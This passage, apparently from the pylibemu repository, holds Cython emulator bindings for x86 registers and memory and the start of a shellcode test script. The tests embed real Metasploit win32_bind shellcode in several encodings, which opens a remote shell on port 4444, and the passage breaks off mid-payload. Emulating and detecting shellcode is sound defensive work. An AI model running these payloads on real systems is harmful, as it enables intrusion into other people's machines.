683 | @type val: uint32_t 684 | @param val: 32-bit value 685 | 686 | Raises RuntimeError if the Emulator is not initialized 687 | ''' 688 | cdef c_emu_cpu *_cpu 689 | 690 | if self._emu is NULL: 691 | raise RuntimeError('Emulator not initialized') 692 | 693 | _cpu = emu_cpu_get(self._emu) 694 | emu_cpu_reg32_set(_cpu, reg, val) 695 | 696 | def cpu_reg16_get(self, c_emu_reg16 reg): 697 | ''' 698 | Method used to get the 16-bit value stored in a register 699 | 700 | @type reg: Integer 701 | @param reg: Register index 702 | ax = 0 703 | cx = 1 704 | dx = 2 705 | bx = 3 706 | sp = 4 707 | bp = 5 708 | si = 6 709 | di = 7 710 | 711 | @rtype: uint16_t 712 | @return: 16-bit value stored in the register 713 | 714 | Raises RuntimeError if the Emulator is not initialized 715 | ''' 716 | cdef c_emu_cpu *_cpu 717 | 718 | if self._emu is NULL: 719 | raise RuntimeError('Emulator not initialized') 720 | 721 | _cpu = emu_cpu_get(self._emu) 722 | return emu_cpu_reg16_get(_cpu, reg) 723 | 724 | def cpu_reg16_set(self, c_emu_reg16 reg, uint16_t val): 725 | ''' 726 | Method used to set a register with a 16-bit value 727 | 728 | @type reg: Integer 729 | @param reg: Register index 730 | ax = 0 731 | cx = 1 732 | dx = 2 733 | bx = 3 734 | sp = 4 735 | bp = 5 736 | si = 6 737 | di = 7 738 | 739 | @type val: uint16_t 740 | @param val: 16-bit value 741 | 742 | Raises RuntimeError if the Emulator is not initialized 743 | ''' 744 | cdef c_emu_cpu *_cpu 745 | 746 | if self._emu is NULL: 747 | raise RuntimeError('Emulator not initialized') 748 | 749 | _cpu = emu_cpu_get(self._emu) 750 | emu_cpu_reg16_set(_cpu, reg, val) 751 | 752 | def cpu_reg8_get(self, c_emu_reg8 reg): 753 | ''' 754 | Method used to get the 8-bit value stored in a register 755 | 756 | @type reg: Integer 757 | @param reg: Register index 758 | al = 0 759 | cl = 1 760 | dl = 2 761 | bl = 3 762 | ah = 4 763 | ch = 5 764 | dh = 6 765 | bh = 7 766 | 767 | @rtype: uint8_t 768 | @return: 8-bit value stored in the register 769 | 770 | Raises RuntimeError if the Emulator is not initialized 771 | ''' 772 | cdef c_emu_cpu *_cpu 773 | 774 | if self._emu is NULL: 775 | raise RuntimeError('Emulator not initialized') 776 | 777 | _cpu = emu_cpu_get(self._emu) 778 | return emu_cpu_reg8_get(_cpu, reg) 779 | 780 | def cpu_reg8_set(self, c_emu_reg8 reg, uint8_t val): 781 | ''' 782 | Method used to set a register with a 8-bit value 783 | 784 | @type reg: Integer 785 | @param reg: Register index 786 | al = 0 787 | cl = 1 788 | dl = 2 789 | bl = 3 790 | ah = 4 791 | ch = 5 792 | dh = 6 793 | bh = 7 794 | 795 | @type val: uint8_t 796 | @param val: 8-bit value 797 | 798 | Raises RuntimeError if the Emulator is not initialized 799 | ''' 800 | cdef c_emu_cpu *_cpu 801 | 802 | if self._emu is NULL: 803 | raise RuntimeError('Emulator not initialized') 804 | 805 | _cpu = emu_cpu_get(self._emu) 806 | emu_cpu_reg8_set(_cpu, reg, val) 807 | 808 | def cpu_eflags_get(self): 809 | ''' 810 | Method used to get the 32-bit value stored in the register eflags 811 | 812 | @rtype: uint32_t 813 | @return: 32-bit value stored in the register eflags 814 | 815 | Raises RuntimeError if the Emulator is not initialized 816 | ''' 817 | cdef c_emu_cpu *_cpu 818 | 819 | if self._emu is NULL: 820 | raise RuntimeError('Emulator not initialized') 821 | 822 | _cpu = emu_cpu_get(self._emu) 823 | return emu_cpu_eflags_get(_cpu) 824 | 825 | def cpu_eflags_set(self, uint32_t val): 826 | ''' 827 | Method used to set the register eflags with a 32-bit value 828 | 829 | @type val: uint32_t 830 | @param val: 32-bit value 831 | 832 | Raises RuntimeError if the Emulator is not initialized 833 | ''' 834 | cdef c_emu_cpu *_cpu 835 | 836 | if self._emu is NULL: 837 | raise RuntimeError('Emulator not initialized') 838 | 839 | _cpu = emu_cpu_get(self._emu) 840 | emu_cpu_eflags_set(_cpu, val) 841 | 842 | def cpu_eip_set(self, uint32_t eip): 843 | ''' 844 | Method used to set the register eip with a 32-bit value 845 | 846 | @type val: uint32_t 847 | @param val: 32-bit value 848 | 849 | Raises RuntimeError if the Emulator is not initialized 850 | ''' 851 | cdef c_emu_cpu *_cpu 852 | 853 | if self._emu is NULL: 854 | raise RuntimeError('Emulator not initialized') 855 | 856 | _cpu = emu_cpu_get(self._emu) 857 | emu_cpu_eip_set(_cpu, eip) 858 | 859 | def cpu_eip_get(self): 860 | ''' 861 | Method used to get the 32-bit value stored in the register eip 862 | 863 | @rtype: uint32_t 864 | @return: 32-bit value stored in the register eip 865 | 866 | Raises RuntimeError if the Emulator is not initialized 867 | ''' 868 | cdef c_emu_cpu *_cpu 869 | 870 | if self._emu is NULL: 871 | raise RuntimeError('Emulator not initialized') 872 | 873 | _cpu = emu_cpu_get(self._emu) 874 | return emu_cpu_eip_get(_cpu) 875 | 876 | def cpu_parse(self): 877 | ''' 878 | Method used to parse an instruction at eip 879 | 880 | Raises RuntimeError if the Emulator is not initialized 881 | ''' 882 | cdef c_emu_cpu *_cpu 883 | 884 | if self._emu is NULL: 885 | raise RuntimeError('Emulator not initialized') 886 | 887 | _cpu = emu_cpu_get(self._emu) 888 | return emu_cpu_parse(_cpu) 889 | 890 | def cpu_step(self): 891 | ''' 892 | Method used to step the last instruction 893 | 894 | Raises RuntimeError if the Emulator is not initialized 895 | ''' 896 | cdef c_emu_cpu *_cpu 897 | 898 | if self._emu is NULL: 899 | raise RuntimeError('Emulator not initialized') 900 | 901 | _cpu = emu_cpu_get(self._emu) 902 | return emu_cpu_step(_cpu) 903 | 904 | def cpu_debugflag_set(self, uint8_t flag): 905 | ''' 906 | Method used to set a cpu debug flag 907 | 908 | @type flag: uint8_t 909 | @param flag: flag to set 910 | 911 | Raises RuntimeError if the Emulator is not initialized 912 | ''' 913 | cdef c_emu_cpu *_cpu 914 | 915 | if self._emu is NULL: 916 | raise RuntimeError('Emulator not initialized') 917 | 918 | _cpu = emu_cpu_get(self._emu) 919 | emu_cpu_debugflag_set(_cpu, flag) 920 | 921 | def cpu_debugflag_unset(self, uint8_t flag): 922 | ''' 923 | Method used to unset a cpu debug flag 924 | 925 | @type flag: uint8_t 926 | @param flag: flag to unset 927 | 928 | Raises RuntimeError if the Emulator is not initialized 929 | ''' 930 | cdef c_emu_cpu *_cpu 931 | 932 | if self._emu is NULL: 933 | raise RuntimeError('Emulator not initialized') 934 | 935 | _cpu = emu_cpu_get(self._emu) 936 | emu_cpu_debugflag_unset(_cpu, flag) 937 | 938 | def cpu_get_current_instruction(self): 939 | ''' 940 | Method used to disassemble the current instruction 941 | 942 | @rtype : string 943 | @return : disassembled current instruction 944 | 945 | Raises RuntimeError if the Emulator is not initialized 946 | ''' 947 | if self._emu is NULL: 948 | raise RuntimeError('Emulator not initialized') 949 | 950 | self.cpu_debugflag_set(1) 951 | self.cpu_parse() 952 | instr_string = emu_cpu_get(self._emu).instr_string 953 | self.cpu_debugflag_unset(1) 954 | 955 | return instr_string 956 | 957 | # Memory methods 958 | def memory_write_byte(self, uint32_t addr, uint8_t byte): 959 | ''' 960 | Method used to write a byte at a memory location 961 | 962 | @type addr: uint32_t 963 | @param addr: memory location address 964 | 965 | @type byte: uint8_t 966 | @param byte: byte to write 967 | 968 | Raises RuntimeError if the Emulator is not initialized 969 | ''' 970 | cdef c_emu_memory *_mem 971 | 972 | if self._emu is NULL: 973 | raise RuntimeError('Emulator not initialized') 974 | 975 | _mem = emu_memory_get(self._emu) 976 | emu_memory_write_byte(_mem, addr, byte) 977 | 978 | def memory_write_word(self, uint32_t addr, uint16_t word): 979 | ''' 980 | Method used to write a word at a memory location 981 | 982 | @type addr: uint32_t 983 | @param addr: memory location address 984 | 985 | @type word: uint16_t 986 | @param word: word to write 987 | 988 | Raises RuntimeError if the Emulator is not initialized 989 | ''' 990 | cdef c_emu_memory *_mem 991 | 992 | if self._emu is NULL: 993 | raise RuntimeError('Emulator not initialized') 994 | 995 | _mem = emu_memory_get(self._emu) 996 | emu_memory_write_word(_mem, addr, word) 997 | 998 | def memory_write_dword(self, uint32_t addr, uint32_t dword): 999 | ''' 1000 | Method used to write a dword at a memory location 1001 | 1002 | @type addr: uint32_t 1003 | @param addr: memory location address 1004 | 1005 | @type dword: uint32_t 1006 | @param dword: dword to write 1007 | 1008 | Raises RuntimeError if the Emulator is not initialized 1009 | ''' 1010 | cdef c_emu_memory *_mem 1011 | 1012 | if self._emu is NULL: 1013 | raise RuntimeError('Emulator not initialized') 1014 | 1015 | _mem = emu_memory_get(self._emu) 1016 | emu_memory_write_dword(_mem, addr, dword) 1017 | 1018 | def memory_write_block(self, uint32_t addr, src, size_t _len): 1019 | ''' 1020 | Method used to write a block at a memory location 1021 | 1022 | @type addr: uint32_t 1023 | @param addr: memory location address 1024 | 1025 | @type src: bytes 1026 | @param src: block of data to write 1027 | 1028 | @type _len: size_t 1029 | @param _len: block size 1030 | 1031 | Raises RuntimeError if the Emulator is not initialized 1032 | ''' 1033 | cdef c_emu_memory *_mem 1034 | 1035 | if self._emu is NULL: 1036 | raise RuntimeError('Emulator not initialized') 1037 | 1038 | _mem = emu_memory_get(self._emu) 1039 | emu_memory_write_block(_mem, addr, src, _len) 1040 | 1041 | def memory_read_byte(self, uint32_t addr): 1042 | ''' 1043 | Method used to read a byte at a memory location 1044 | 1045 | @type addr: uint32_t 1046 | @param addr: memory location address 1047 | 1048 | @rtype: uint8_t 1049 | @return: byte at memory location address 1050 | 1051 | Raises RuntimeError if the Emulator is not initialized 1052 | ''' 1053 | cdef c_emu_memory *_mem 1054 | cdef uint8_t byte 1055 | 1056 | if self._emu is NULL: 1057 | raise RuntimeError('Emulator not initialized') 1058 | 1059 | _mem = emu_memory_get(self._emu) 1060 | if emu_memory_read_byte(_mem, addr, &byte): 1061 | raise RuntimeError("Error while reading a byte at address 0x%x" % (addr, )) 1062 | 1063 | return byte 1064 | 1065 | def memory_read_word(self, uint32_t addr): 1066 | ''' 1067 | Method used to read a word at a memory location 1068 | 1069 | @type addr: uint32_t 1070 | @param addr: memory location address 1071 | 1072 | @rtype: uint16_t 1073 | @return: word at memory location address 1074 | 1075 | Raises RuntimeError if the Emulator is not initialized 1076 | ''' 1077 | cdef c_emu_memory *_mem 1078 | cdef uint16_t word 1079 | 1080 | if self._emu is NULL: 1081 | raise RuntimeError('Emulator not initialized') 1082 | 1083 | _mem = emu_memory_get(self._emu) 1084 | if emu_memory_read_word(_mem, addr, &word): 1085 | raise RuntimeError("Error while reading a word at address 0x%x" % (addr, )) 1086 | 1087 | return word 1088 | 1089 | def memory_read_dword(self, uint32_t addr): 1090 | ''' 1091 | Method used to read a dword at a memory location 1092 | 1093 | @type addr: uint32_t 1094 | @param addr: memory location address 1095 | 1096 | @rtype: uint32_t 1097 | @return: word at memory location address 1098 | 1099 | Raises RuntimeError if the Emulator is not initialized 1100 | ''' 1101 | cdef c_emu_memory *_mem 1102 | cdef uint32_t dword 1103 | 1104 | if self._emu is NULL: 1105 | raise RuntimeError('Emulator not initialized') 1106 | 1107 | _mem = emu_memory_get(self._emu) 1108 | if emu_memory_read_dword(_mem, addr, &dword): 1109 | raise RuntimeError("Error while reading a word at address 0x%x" % (addr, )) 1110 | 1111 | return dword 1112 | 1113 | def memory_read_block(self, uint32_t addr, size_t _len): 1114 | ''' 1115 | Method used to read a block at a memory location 1116 | 1117 | @type addr: uint32_t 1118 | @param addr: memory location address 1119 | 1120 | @type _len: size_t 1121 | @param _len: block size 1122 | 1123 | @rtype: char * 1124 | @return: block at memory location address 1125 | 1126 | Raises RuntimeError if the Emulator is not initialized 1127 | ''' 1128 | cdef c_emu_memory *_mem 1129 | cdef void *block 1130 | 1131 | if self._emu is NULL: 1132 | raise RuntimeError('Emulator not initialized') 1133 | 1134 | block = malloc(_len) 1135 | if block is NULL: 1136 | raise RuntimeError('Error while allocating memory') 1137 | 1138 | _mem = emu_memory_get(self._emu) 1139 | if emu_memory_read_block(_mem, addr, block, _len): 1140 | raise RuntimeError("Error while reading a dword at address 0x%x" % (addr, )) 1141 | 1142 | return block 1143 | 1144 | def memory_read_string(self, uint32_t addr, uint32_t maxsize): 1145 | ''' 1146 | Method used to read a string at a memory location 1147 | 1148 | @type addr: uint32_t 1149 | @param addr: memory location address 1150 | 1151 | @type maxsize: uint32_t 1152 | @param maxsize: string max size 1153 | 1154 | @rtype: char * 1155 | @return: string at memory location address 1156 | 1157 | Raises RuntimeError if the Emulator is not initialized 1158 | ''' 1159 | cdef c_emu_memory *_mem 1160 | cdef c_emu_string s 1161 | 1162 | if self._emu is NULL: 1163 | raise RuntimeError('Emulator not initialized') 1164 | 1165 | _mem = emu_memory_get(self._emu) 1166 | if emu_memory_read_string(_mem, addr, &s, maxsize): 1167 | raise RuntimeError("Error while reading a string at address 0x%x" % (addr, )) 1168 | 1169 | return s.data 1170 | 1171 | def memory_segment_select(self, c_emu_segment segment): 1172 | ''' 1173 | Method used to select a segment 1174 | 1175 | @type segment: Integer 1176 | @param segment: Segment index 1177 | s_cs = 0 1178 | s_ss = 1 1179 | s_ds = 2 1180 | s_es = 3 1181 | s_fs = 4 1182 | s_gs = 5 1183 | 1184 | Raises RuntimeError if the Emulator is not initialized 1185 | ''' 1186 | cdef c_emu_memory *_mem 1187 | 1188 | if self._emu is NULL: 1189 | raise RuntimeError('Emulator not initialized') 1190 | 1191 | _mem = emu_memory_get(self._emu) 1192 | emu_memory_segment_select(_mem, segment) 1193 | 1194 | def memory_segment_get(self): 1195 | ''' 1196 | Method used to get the current segment 1197 | 1198 | @rtype segment: Integer 1199 | @rparam segment: Segment index 1200 | s_cs = 0 1201 | s_ss = 1 1202 | s_ds = 2 1203 | s_es = 3 1204 | s_fs = 4 1205 | s_gs = 5 1206 | 1207 | Raises RuntimeError if the Emulator is not initialized 1208 | ''' 1209 | cdef c_emu_memory *_mem 1210 | 1211 | if self._emu is NULL: 1212 | raise RuntimeError('Emulator not initialized') 1213 | 1214 | _mem = emu_memory_get(self._emu) 1215 | return emu_memory_segment_get(_mem) 1216 | 1217 | # Win32 environment 1218 | def env_w32_hook_check(self): 1219 | ''' 1220 | Method used to check if a hooked Win32 API is at the 1221 | current eip 1222 | 1223 | @rtype boolean 1224 | @rparam True if a hooked Win32 API is at the current 1225 | eip, False otherwise 1226 | 1227 | Raises RuntimeError if the Emulator is not initialized 1228 | ''' 1229 | cdef c_emu_env *_env 1230 | 1231 | if self._emu is NULL: 1232 | raise RuntimeError('Emulator not initialized') 1233 | 1234 | _env = emu_env_new(self._emu) 1235 | if _env is NULL: 1236 | print(emu_strerror(self._emu)) 1237 | raise RuntimeError('Emulator environment error') 1238 | 1239 | if emu_env_w32_eip_check(_env) is NULL: 1240 | return False 1241 | 1242 | return True 1243 | -------------------------------------------------------------------------------- /tests/sctest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # sctest.py 4 | # 5 | # Copyright(c) 2011-2022 Angelo Dell'Aera 6 | # 7 | # This program is free software; you can redistribute it and/or modify 8 | # it under the terms of the GNU General Public License version 2 as 9 | # published by the Free Software Foundation. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program; if not, write to the Free Software 18 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, 19 | # MA 02111-1307 USA 20 | 21 | import sys 22 | import getopt 23 | import logging 24 | 25 | #log = logging.getLogger('pylibemu') 26 | #handler = logging.StreamHandler(stream = sys.stdout) 27 | #formatter = logging.Formatter(datefmt = None) 28 | #handler.setFormatter(formatter) 29 | #log.addHandler(handler) 30 | #log.setLevel(logging.INFO) 31 | 32 | from pylibemu import Emulator 33 | 34 | class ShellcodeTest(): 35 | def __init__(self): 36 | self.log = logging.getLogger("ShellcodeTest") 37 | self.log.setLevel(logging.DEBUG) 38 | self.emulator = Emulator() 39 | 40 | def run(self): 41 | index = 1 42 | while True: 43 | test = getattr(self, "testShellcode%s" % (index, ), None) 44 | if test is None: 45 | break 46 | test() 47 | index += 1 48 | 49 | def _runShellcode(self, shellcode, index): 50 | self.emulator.new() 51 | offset = self.emulator.shellcode_getpc_test(shellcode) 52 | if offset < 0: 53 | offset = 0 54 | 55 | self.log.debug("Offset: %d" % (offset, )) 56 | 57 | self.emulator.prepare(shellcode, offset) 58 | self.emulator.test() 59 | 60 | self.log.info(self.emulator.emu_profile_output.decode('utf-8')) 61 | if self.emulator.emu_profile_truncated: 62 | self.log.warning("[WARNING] Emulation profile truncated") 63 | 64 | self.emulator.free() 65 | 66 | def runShellcode(self, shellcode, index): 67 | self.emulator.new() 68 | self.emulator.run(shellcode) 69 | 70 | self.log.debug("Offset: %d" % (self.emulator.offset, )) 71 | self.log.info(self.emulator.emu_profile_output.decode('utf-8')) 72 | if self.emulator.emu_profile_truncated: 73 | self.log.warning("[WARNING] Emulation profile truncated") 74 | 75 | self.emulator.free() 76 | 77 | def testShellcode0(self): 78 | self.run() 79 | 80 | def testShellcode1(self): 81 | """ 82 | win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com 83 | """ 84 | 85 | shellcode = b"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" 86 | shellcode += b"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" 87 | shellcode += b"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" 88 | shellcode += b"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" 89 | shellcode += b"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" 90 | shellcode += b"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" 91 | shellcode += b"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" 92 | shellcode += b"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" 93 | shellcode += b"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" 94 | shellcode += b"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" 95 | shellcode += b"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" 96 | shellcode += b"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" 97 | shellcode += b"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" 98 | shellcode += b"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" 99 | shellcode += b"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" 100 | shellcode += b"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" 101 | shellcode += b"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" 102 | shellcode += b"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" 103 | shellcode += b"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" 104 | shellcode += b"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0" 105 | 106 | self.runShellcode(shellcode, 1) 107 | 108 | def testShellcode2(self): 109 | """ 110 | win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com 111 | """ 112 | 113 | shellcode = b"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x47" 114 | shellcode += b"\x13\x2b\xc0\x83\xee\xfc\xe2\xf4\xbb\x79\xc0\x8d\xaf\xea\xd4\x3f" 115 | shellcode += b"\xb8\x73\xa0\xac\x63\x37\xa0\x85\x7b\x98\x57\xc5\x3f\x12\xc4\x4b" 116 | shellcode += b"\x08\x0b\xa0\x9f\x67\x12\xc0\x89\xcc\x27\xa0\xc1\xa9\x22\xeb\x59" 117 | shellcode += b"\xeb\x97\xeb\xb4\x40\xd2\xe1\xcd\x46\xd1\xc0\x34\x7c\x47\x0f\xe8" 118 | shellcode += b"\x32\xf6\xa0\x9f\x63\x12\xc0\xa6\xcc\x1f\x60\x4b\x18\x0f\x2a\x2b" 119 | shellcode += b"\x44\x3f\xa0\x49\x2b\x37\x37\xa1\x84\x22\xf0\xa4\xcc\x50\x1b\x4b" 120 | shellcode += b"\x07\x1f\xa0\xb0\x5b\xbe\xa0\x80\x4f\x4d\x43\x4e\x09\x1d\xc7\x90" 121 | shellcode += b"\xb8\xc5\x4d\x93\x21\x7b\x18\xf2\x2f\x64\x58\xf2\x18\x47\xd4\x10" 122 | shellcode += b"\x2f\xd8\xc6\x3c\x7c\x43\xd4\x16\x18\x9a\xce\xa6\xc6\xfe\x23\xc2" 123 | shellcode += b"\x12\x79\x29\x3f\x97\x7b\xf2\xc9\xb2\xbe\x7c\x3f\x91\x40\x78\x93" 124 | shellcode += b"\x14\x40\x68\x93\x04\x40\xd4\x10\x21\x7b\x3a\x9c\x21\x40\xa2\x21" 125 | shellcode += b"\xd2\x7b\x8f\xda\x37\xd4\x7c\x3f\x91\x79\x3b\x91\x12\xec\xfb\xa8" 126 | shellcode += b"\xe3\xbe\x05\x29\x10\xec\xfd\x93\x12\xec\xfb\xa8\xa2\x5a\xad\x89" 127 | shellcode += b"\x10\xec\xfd\x90\x13\x47\x7e\x3f\x97\x80\x43\x27\x3e\xd5\x52\x97" 128 | shellcode += b"\xb8\xc5\x7e\x3f\x97\x75\x41\xa4\x21\x7b\x48\xad\xce\xf6\x41\x90" 129 | shellcode += b"\x1e\x3a\xe7\x49\xa0\x79\x6f\x49\xa5\x22\xeb\x33\xed\xed\x69\xed" 130 | shellcode += b"\xb9\x51\x07\x53\xca\x69\x13\x6b\xec\xb8\x43\xb2\xb9\xa0\x3d\x3f" 131 | shellcode += b"\x32\x57\xd4\x16\x1c\x44\x79\x91\x16\x42\x41\xc1\x16\x42\x7e\x91" 132 | shellcode += b"\xb8\xc3\x43\x6d\x9e\x16\xe5\x93\xb8\xc5\x41\x3f\xb8\x24\xd4\x10" 133 | shellcode += b"\xcc\x44\xd7\x43\x83\x77\xd4\x16\x15\xec\xfb\xa8\xb7\x99\x2f\x9f" 134 | shellcode += b"\x14\xec\xfd\x3f\x97\x13\x2b\xc0" 135 | 136 | self.runShellcode(shellcode, 2) 137 | 138 | def testShellcode3(self): 139 | """ 140 | win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com 141 | """ 142 | 143 | shellcode = b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" 144 | shellcode += b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" 145 | shellcode += b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" 146 | shellcode += b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 147 | shellcode += b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" 148 | shellcode += b"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" 149 | shellcode += b"\x4e\x46\x46\x52\x46\x52\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47" 150 | shellcode += b"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x38" 151 | shellcode += b"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58" 152 | shellcode += b"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" 153 | shellcode += b"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" 154 | shellcode += b"\x46\x4f\x4b\x33\x46\x45\x46\x52\x4a\x42\x45\x47\x45\x4e\x4b\x48" 155 | shellcode += b"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34" 156 | shellcode += b"\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38" 157 | shellcode += b"\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x33\x4b\x4d" 158 | shellcode += b"\x46\x56\x4b\x38\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x30\x4b\x58" 159 | shellcode += b"\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x54\x4a\x30\x50\x55\x4a\x46" 160 | shellcode += b"\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56" 161 | shellcode += b"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x43\x4a\x46\x47\x57\x43\x57" 162 | shellcode += b"\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" 163 | shellcode += b"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" 164 | shellcode += b"\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x50\x45\x55\x4c\x56\x44\x30" 165 | shellcode += b"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45" 166 | shellcode += b"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x35\x43\x45\x43\x35\x43\x54" 167 | shellcode += b"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x51" 168 | shellcode += b"\x4e\x35\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x49\x4a\x36\x46\x4a" 169 | shellcode += b"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41" 170 | shellcode += b"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52" 171 | shellcode += b"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d" 172 | shellcode += b"\x4a\x56\x45\x4e\x49\x44\x48\x58\x49\x34\x47\x45\x4f\x4f\x48\x4d" 173 | shellcode += b"\x42\x55\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46" 174 | shellcode += b"\x47\x4e\x49\x37\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" 175 | shellcode += b"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x46\x4a\x56\x43\x46" 176 | shellcode += b"\x4d\x56\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x42\x4e\x4c" 177 | shellcode += b"\x49\x38\x47\x4e\x4c\x46\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" 178 | shellcode += b"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x42\x50\x4f\x44\x34\x4e\x52" 179 | shellcode += b"\x43\x39\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" 180 | shellcode += b"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f" 181 | shellcode += b"\x48\x4d\x4b\x55\x47\x55\x44\x55\x41\x45\x41\x55\x41\x45\x4c\x56" 182 | shellcode += b"\x41\x50\x41\x35\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56" 183 | shellcode += b"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" 184 | shellcode += b"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f" 185 | shellcode += b"\x43\x38\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" 186 | shellcode += b"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x35\x4f\x4f\x48\x4d" 187 | shellcode += b"\x4f\x4f\x42\x4d\x5a" 188 | 189 | self.runShellcode(shellcode, 3) 190 | 191 | def testShellcode4(self): 192 | """ 193 | win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com 194 | """ 195 | 196 | shellcode = b"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02" 197 | shellcode += b"\x19\x61\x76\x83\xeb\xfc\xe2\xf4\xfe\x73\x8a\x3b\xea\xe0\x9e\x89" 198 | shellcode += 